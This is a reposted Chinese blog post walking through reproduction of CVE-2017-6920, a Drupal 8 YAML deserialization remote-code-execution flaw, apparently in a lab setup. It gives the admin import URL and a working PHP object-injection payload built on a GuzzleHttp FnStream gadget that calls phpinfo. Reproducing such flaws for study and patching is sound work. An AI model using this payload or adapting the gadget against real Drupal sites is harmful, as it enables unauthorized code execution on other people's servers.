码迷,mamicode.com
首页 > 其他好文 > 详细

Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920

时间:2019-07-19 12:21:24      阅读:230      评论:0      收藏:0      [点我收藏+]

标签:evel   网页   png   远程代码执行   int   src   imp   stream   远程   

漏洞背景:
2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。

漏洞复现:
1.打开网页先登录一个管理员账号。
2.访问 http://你的ip:8080/admin/config/development/configuration/single/import
3.然后如下图所示:第二个随便填。技术图片
poc:!php/object "O:24:\"GuzzleHttp\Psr7\FnStream\":2:{s:33:\"\0GuzzleHttp\Psr7\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

 4.然后执行最下面的import,会再出来个phpinto就代表成了。

Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920

标签:evel   网页   png   远程代码执行   int   src   imp   stream   远程   

原文地址:https://blog.51cto.com/14259144/2421673

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!